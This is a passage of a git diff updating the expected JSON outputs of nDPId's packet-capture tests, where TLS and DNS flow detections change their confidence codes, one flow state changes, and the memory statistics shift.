+01094{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2,"source":"tls-rdn-extract.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946681200000,"flow_last_seen":946681200000,"flow_idle_time":7580000,"flow_min_l4_payload_len":127,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":1587,"flow_avg_l4_payload_len":793,"midstream":1,"thread_ts_msec":946681200000,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"213.199.149.251","src_port":31337,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"ads1.msads.net","ja3":"2201d8e006f8f005a6b415f61e677532","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA"}} 
02411{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"tls-rdn-extract.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":946681200000,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"thread_ts_msec":946681200000,"pkt":"ERERERERIiIiIiIiCABFAAXc5PNAADUGLVnVx5X7CgAAAQG7emnv2LwfZGeGnVAQGJjDXgAAbTEUMBIGA1UEAwwLKi5zLW1zbi5jb20xFzAVBgNVBAMMDioubGl2ZS1pbnQubmV0MR8wHQYDVQQDDBYqLndpbmRvd3NwaG9uZS1pbnQuY29tMRswGQYDVQQDDBIqLndpbmRvd3NwaG9uZS5jb20xKjAoBgNVBAMMISoucGFydG5lci1wYy53aW5kb3dzcGhvbmUtaW50LmNvbTEfMB0GA1UEAwwWKi5tYW5hZ2UubWljcm9zb2Z0LmNvbTEYMBYGA1UEAwwPKi52by5tc2VjbmQubmV0MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAuX3PkoiInBfw68+6JNH406C4alrEnikcq1FZEZJZj8A0h7uDLWO01R+9CYljtZsYv4E+pfWvi8Z31QoN\/mqJYHgutax6\/UWMDIxFsXaIn1iXAoBA481Pyqa8XbzdmibAvotkEOm0ksJYJlu7VrGuQP+fyz69HW2nTnewmEyTsEy9pTZjqsxFdtBcWm2sS5KQA3Hoj6NzWl54VkXacUcpgQraZZFiSKVJpxhZpAqND3x7NCgSdQvwN2uTFwRCsRagxmCSSaZkQSbYCDh7lvCo6r5wBODibkMqCxrJ4nyg5Uw+J74SsSHhtBMkb6YMlWe5gPOyYSZfIVCby4onZWx45wIDAQABo4IGXzCCBlswDAYDVR0TAQH\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"} -03323{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6,"source":"tls-rdn-extract.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":946681200000,"flow_last_seen":946681200000,"flow_idle_time":7580000,"flow_min_l4_payload_len":127,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":6881,"flow_avg_l4_payload_len":1146,"midstream":1,"thread_ts_msec":946681200000,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"213.199.149.251","src_port":31337,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": 
{"total":250,"client":225,"server":25}},"9": {"risk":"TLS Cert Expired","severity":"High","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"ads1.msads.net","server_names":"*.vo.msecnd.net,*.officeapps.live.com,*.msads.net,*.ads2.msads.net,*.stc.s-msn.com,cdn.dc2files.*.livefilestore-int.com,cdn.*.livefilestore.com,*.marketplace.windowsmobile.com,*.marketplace.windowsmobile-int.com,*.marketplace.windowsmobile-perf.com,*.stj.s-msn.com,ajax.microsoft.com,*.microsoft-sbs-domains.com,*.live.net,*.msn.com,*.msn-int.com,*.f1ds.shared.live-int.com,*.f1ds.wlxrs-int.com,*.shared.live-int.com,*.shared.live.com,*.microsoft.com,*.live.com,*.live-int.com,*.wlxrs.com,*.wlxrs-int.com,*.st.s-msn.com,*.stb.s-msn.com,images.moxy.windowsphone-int.com,*.wlxrsu-int.com,images.partner.windowsphone-int.com,images.partner.windowsphone.com,*.jp.msn.com,*.c3scs.jp.msn.com,*.aspnetcdn.com,*.hotmail.com,*.partner-df.windowsphone-int.com,*.s-msn.com,*.live-int.net,*.windowsphone-int.com,*.windowsphone.com,*.partner-pc.windowsphone-int.com,*.manage.microsoft.com","ja3":"2201d8e006f8f005a6b415f61e677532","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","issuerDN":"CN=Microsoft Secure Server Authority","subjectDN":"C=US, L=Redmond, O=Microsoft, OU=GFS, CN=*.officeapps.live.com, CN=*.msads.net, CN=*.ads2.msads.net, CN=*.stc.s-msn.com, CN=cdn.dc2files.*.livefilestore-int.com, CN=cdn.*.livefilestore.com, CN=*.marketplace.windowsmobile.com, CN=*.marketplace.windowsmobile-int.com, CN=*.marketplace.windowsmobile-perf.com, CN=*.stj.s-msn.com, CN=ajax.microsoft.com, CN=*.microsoft-sbs-domains.com, CN=*.live.net, CN=*.msn.com, CN=*.msn-int.com, CN=*.f1ds.shared.live-int.com, CN=*.f1ds.wlxrs-int.com, CN=*.shared.live-int.com, CN=*.shared.live.com, CN=*.microsoft.com, CN=*.live.com, CN=*.live-int.com, 
CN=*.wlxrs.com, CN=*.wlxrs-int.com, CN=*.st.s-msn.com, CN=*.stb.s-msn.com, CN=images.moxy.windowsphone-int.com, CN=*.wlxrsu-int.com, CN=images.partner.windowsphone-int.com, CN=images.partner.windowsphone.com, CN=*.jp.msn.com, CN=*.c3scs.jp.msn.com, CN=*.aspnetcdn.com, CN=*.hotmail.com, CN=*.partner-df.windowsphone-int.com, CN=*.s-msn.com, CN=*.live-int.net, CN=*.windowsphone-int.com, CN=*.windowsphone.com, CN=*.partner-pc.windowsphone-int.com, CN=*.manage.microsoft.com, CN=*.vo.msecnd.net","fingerprint":"FF:BF:9A:69:8F:C8:44:FF:89:F2:61:49:A7:D1:9A:98:DE:32:84:3B"}} -01024{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6,"source":"tls-rdn-extract.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":946681200000,"flow_last_seen":946681200000,"flow_idle_time":7580000,"flow_min_l4_payload_len":127,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":6881,"flow_avg_l4_payload_len":1146,"midstream":1,"thread_ts_msec":946681200000,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"213.199.149.251","src_port":31337,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}},"9": {"risk":"TLS Cert Expired","severity":"High","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Web"}} 
+03323{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6,"source":"tls-rdn-extract.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":946681200000,"flow_last_seen":946681200000,"flow_idle_time":7580000,"flow_min_l4_payload_len":127,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":6881,"flow_avg_l4_payload_len":1146,"midstream":1,"thread_ts_msec":946681200000,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"213.199.149.251","src_port":31337,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}},"9": {"risk":"TLS Cert Expired","severity":"High","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Web"},"tls": 
{"version":"TLSv1","client_requested_server_name":"ads1.msads.net","server_names":"*.vo.msecnd.net,*.officeapps.live.com,*.msads.net,*.ads2.msads.net,*.stc.s-msn.com,cdn.dc2files.*.livefilestore-int.com,cdn.*.livefilestore.com,*.marketplace.windowsmobile.com,*.marketplace.windowsmobile-int.com,*.marketplace.windowsmobile-perf.com,*.stj.s-msn.com,ajax.microsoft.com,*.microsoft-sbs-domains.com,*.live.net,*.msn.com,*.msn-int.com,*.f1ds.shared.live-int.com,*.f1ds.wlxrs-int.com,*.shared.live-int.com,*.shared.live.com,*.microsoft.com,*.live.com,*.live-int.com,*.wlxrs.com,*.wlxrs-int.com,*.st.s-msn.com,*.stb.s-msn.com,images.moxy.windowsphone-int.com,*.wlxrsu-int.com,images.partner.windowsphone-int.com,images.partner.windowsphone.com,*.jp.msn.com,*.c3scs.jp.msn.com,*.aspnetcdn.com,*.hotmail.com,*.partner-df.windowsphone-int.com,*.s-msn.com,*.live-int.net,*.windowsphone-int.com,*.windowsphone.com,*.partner-pc.windowsphone-int.com,*.manage.microsoft.com","ja3":"2201d8e006f8f005a6b415f61e677532","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","issuerDN":"CN=Microsoft Secure Server Authority","subjectDN":"C=US, L=Redmond, O=Microsoft, OU=GFS, CN=*.officeapps.live.com, CN=*.msads.net, CN=*.ads2.msads.net, CN=*.stc.s-msn.com, CN=cdn.dc2files.*.livefilestore-int.com, CN=cdn.*.livefilestore.com, CN=*.marketplace.windowsmobile.com, CN=*.marketplace.windowsmobile-int.com, CN=*.marketplace.windowsmobile-perf.com, CN=*.stj.s-msn.com, CN=ajax.microsoft.com, CN=*.microsoft-sbs-domains.com, CN=*.live.net, CN=*.msn.com, CN=*.msn-int.com, CN=*.f1ds.shared.live-int.com, CN=*.f1ds.wlxrs-int.com, CN=*.shared.live-int.com, CN=*.shared.live.com, CN=*.microsoft.com, CN=*.live.com, CN=*.live-int.com, CN=*.wlxrs.com, CN=*.wlxrs-int.com, CN=*.st.s-msn.com, CN=*.stb.s-msn.com, CN=images.moxy.windowsphone-int.com, CN=*.wlxrsu-int.com, CN=images.partner.windowsphone-int.com, CN=images.partner.windowsphone.com, CN=*.jp.msn.com, CN=*.c3scs.jp.msn.com, 
CN=*.aspnetcdn.com, CN=*.hotmail.com, CN=*.partner-df.windowsphone-int.com, CN=*.s-msn.com, CN=*.live-int.net, CN=*.windowsphone-int.com, CN=*.windowsphone.com, CN=*.partner-pc.windowsphone-int.com, CN=*.manage.microsoft.com, CN=*.vo.msecnd.net","fingerprint":"FF:BF:9A:69:8F:C8:44:FF:89:F2:61:49:A7:D1:9A:98:DE:32:84:3B"}} +01024{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6,"source":"tls-rdn-extract.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":946681200000,"flow_last_seen":946681200000,"flow_idle_time":7580000,"flow_min_l4_payload_len":127,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":6881,"flow_avg_l4_payload_len":1146,"midstream":1,"thread_ts_msec":946681200000,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"213.199.149.251","src_port":31337,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}},"9": {"risk":"TLS Cert Expired","severity":"High","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Web"}} 00560{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":6,"source":"tls-rdn-extract.pcap","alias":"nDPId-test","packets-captured":6,"packets-processed":6,"total-skipped-flows":0,"total-l4-payload-len":6881,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":2,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":11,"global_ts_msec":946681200000} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 
6/6 @@ -17,9 +17,9 @@ ~~ total active/idle flows...: 1/1 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5911370 bytes -~~ total memory freed........: 5911370 bytes -~~ total allocations/frees...: 118172/118172 +~~ total memory allocated....: 6045004 bytes +~~ total memory freed........: 6045004 bytes +~~ total allocations/frees...: 120934/120934 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 471 chars ~~ json string max len.......: 3328 chars diff --git a/test/results/tls_alert.pcap.out b/test/results/tls_alert.pcap.out index f56795792..ec2d13458 100644 --- a/test/results/tls_alert.pcap.out +++ b/test/results/tls_alert.pcap.out 
@@ -4,15 +4,15 @@ 00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"tls_alert.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1628259176203,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1628259176203,"pkt":"AICPmq69oM7IELEuCABFAABAAABAAEAGtpPAqAHAwKgBFPa2AbvtIEkOAAAAALAC\/\/9MagAAAgQFtAEDAwUBAQgKE9Ij+wAAAAAEAgAA"} 00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"tls_alert.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1628259176203,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1628259176203,"pkt":"oM7IELEuAICPmq69CABFAAA8AABAAEAGtpfAqAEUwKgBwAG79rbEoc1F7SBJD6AScSBz9QAAAgQFtAQCCAoAseWtE9Ij+wEDAwc="} 00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"tls_alert.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1628259176203,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1628259176203,"pkt":"AICPmq69oM7IELEuCABFAAA0AABAAEAGtp\/AqAHAwKgBFPa2AbvtIEkPxKHNRoAQEBUDzQAAAQEIChPSI\/sAseWt"} 
-01031{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"tls_alert.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1628259176203,"flow_last_seen":1628259176204,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":199,"flow_tot_l4_payload_len":199,"flow_avg_l4_payload_len":49,"midstream":0,"thread_ts_msec":1628259176204,"l3_proto":"ip4","src_ip":"192.168.1.192","dst_ip":"192.168.1.20","src_port":63158,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Advertisement"},"tls": {"version":"TLSv1","client_requested_server_name":"www.google-analytics.com","ja3":"d78489b860c8bf7838a6ff0b4d131541","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1"}} +01031{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"tls_alert.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1628259176203,"flow_last_seen":1628259176204,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":199,"flow_tot_l4_payload_len":199,"flow_avg_l4_payload_len":49,"midstream":0,"thread_ts_msec":1628259176204,"l3_proto":"ip4","src_ip":"192.168.1.192","dst_ip":"192.168.1.20","src_port":63158,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"6":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Advertisement"},"tls": 
{"version":"TLSv1","client_requested_server_name":"www.google-analytics.com","ja3":"d78489b860c8bf7838a6ff0b4d131541","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1"}} 00554{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":12,"source":"tls_alert.pcap","alias":"nDPId-test","packets-captured":12,"packets-processed":11,"total-skipped-flows":0,"total-l4-payload-len":206,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":0,"total-updates":0,"current-active-flows":1,"total-active-flows":1,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":8,"global_ts_msec":1642662403350} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":12,"source":"tls_alert.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1642662403350,"flow_last_seen":1642662403350,"flow_idle_time":7580000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":1,"thread_ts_msec":1642662403350,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"160.44.202.202","src_port":37780,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":12,"source":"tls_alert.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1642662403350,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":85,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":85,"pkt_l4_len":51,"thread_ts_msec":1642662403350,"pkt":"eJS0JASgYDjgxTWgCABFAABHB2VAAD8GBknAqAJkoCzKypOUAbvHogbZRxwevVAYAY\/SKwAAFQMDABoAAAAAAAAAAveoY2RlTzXreZQA7uCWWlmb9Q=="} 
-00632{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":12,"source":"tls_alert.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1642662403350,"flow_last_seen":1642662403350,"flow_idle_time":7580000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":1,"thread_ts_msec":1642662403350,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"160.44.202.202","src_port":37780,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} +00632{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":12,"source":"tls_alert.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1642662403350,"flow_last_seen":1642662403350,"flow_idle_time":7580000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":1,"thread_ts_msec":1642662403350,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"160.44.202.202","src_port":37780,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} 00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":13,"source":"tls_alert.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1642662403353,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1642662403353,"pkt":"eJS0JASgYDjgxTWgCABFAAAoB2ZAAD8GBmfAqAJkoCzKypOUAbvHogb4RxwevVARAY+2fQAA"} 
00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":14,"source":"tls_alert.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1642662403415,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1642662403415,"pkt":"eJS0JASgYDjgxTWgCABFAAAoB2dAAD8GBmbAqAJkoCzKypOUAbvHogb4RxwevVARAY+2fQAA"} 00584{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":18,"source":"tls_alert.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":11,"flow_first_seen":1628259176203,"flow_last_seen":1628259176206,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":199,"flow_tot_l4_payload_len":206,"flow_avg_l4_payload_len":18,"midstream":0,"thread_ts_msec":1642662407022,"l3_proto":"ip4","src_ip":"192.168.1.192","dst_ip":"192.168.1.20","src_port":63158,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00584{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":18,"source":"tls_alert.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1642662403350,"flow_last_seen":1642662407022,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":155,"flow_avg_l4_payload_len":22,"midstream":1,"thread_ts_msec":1642662407022,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"160.44.202.202","src_port":37780,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00670{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":18,"source":"tls_alert.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":7,"flow_first_seen":1642662403350,"flow_last_seen":1642662407022,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":155,"flow_avg_l4_payload_len":22,"midstream":1,"thread_ts_msec":1642662407022,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"160.44.202.202","src_port":37780,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} 00557{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":18,"source":"tls_alert.pcap","alias":"nDPId-test","packets-captured":18,"packets-processed":18,"total-skipped-flows":0,"total-l4-payload-len":361,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":2,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":2,"total-idle-flows":2,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":16,"global_ts_msec":1642662407022} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 18/18 @@ -22,9 +22,9 @@ ~~ total active/idle flows...: 2/2 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5875173 bytes -~~ total memory freed........: 5875173 bytes -~~ total allocations/frees...: 118140/118140 +~~ total memory allocated....: 6008807 bytes +~~ total memory freed........: 6008807 bytes +~~ total allocations/frees...: 120902/120902 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 456 chars ~~ json string max len.......: 1036 chars 
diff --git a/test/results/tls_certificate_too_long.pcap.out b/test/results/tls_certificate_too_long.pcap.out index 1fce0d77d..348867331 100644 --- a/test/results/tls_certificate_too_long.pcap.out +++ b/test/results/tls_certificate_too_long.pcap.out 
@@ -9,137 +9,137 @@ 00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1626168075586,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1626168075586,"pkt":"8BiYFWV86qnehSPOCABFAAA0AABAAEAGtm\/AqAGLwKgBedhHzfFqV75MQuV5fYAQD\/PHGQAAAQEICszblug90e6F"} 00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":12,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1626168075664,"flow_last_seen":1626168075664,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1626168075664,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"8.8.8.8","src_port":52251,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":12,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1626168075664,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1626168075664,"pkt":"WNVuaKQA8BiYFWV8CABFAABI5dsAAEARwpjAqAF5CAgICMwbADUANLpX5f8BAAABAAAAAAAAAzEyMQExAzE2OAMxOTIHaW4tYWRkcgRhcnBhAAAMAAE="} 
-00794{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":12,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1626168075664,"flow_last_seen":1626168075664,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1626168075664,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"8.8.8.8","src_port":52251,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"},"dns": {"query":"121.1.168.192.in-addr.arpa","num_queries":0,"num_answers":0,"reply_code":0,"query_type":12,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00794{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":12,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1626168075664,"flow_last_seen":1626168075664,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1626168075664,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"8.8.8.8","src_port":52251,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"},"dns": {"query":"121.1.168.192.in-addr.arpa","num_queries":0,"num_answers":0,"reply_code":0,"query_type":12,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
